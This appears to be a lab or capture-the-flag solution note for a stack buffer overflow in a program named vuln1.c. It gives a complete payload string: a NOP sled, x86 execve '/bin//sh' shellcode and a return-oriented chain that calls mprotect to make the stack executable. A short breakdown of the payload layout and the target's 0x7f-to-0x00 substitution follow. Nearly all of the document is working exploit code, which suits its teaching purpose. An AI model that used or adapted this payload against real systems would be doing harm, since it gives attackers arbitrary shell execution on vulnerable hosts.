"\x90"*203 + "\x31\xc0\x50\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80" + "\x50\x44\xef\xb7"*10  + "\x33\x0e\xe3\xb7" + "\x7f\xe0\xff\xbf" + "\x7f\x10\x7f\x7f" + "\x07\x7f\x7f\x7f" + "\xa4\xee\xff\xbf"


Works only in gdb


NOP * 203 + shellcode (25 bytes) + mprotect_address * 10 + address of "pop pop pop ret" + encoded_aligned_page_address
+ encoded_mprotect_length + encoded_privileges_mprotect + address_of_shellcode


The vuln1.c has a for loop which replaces 0x7f with 0x00
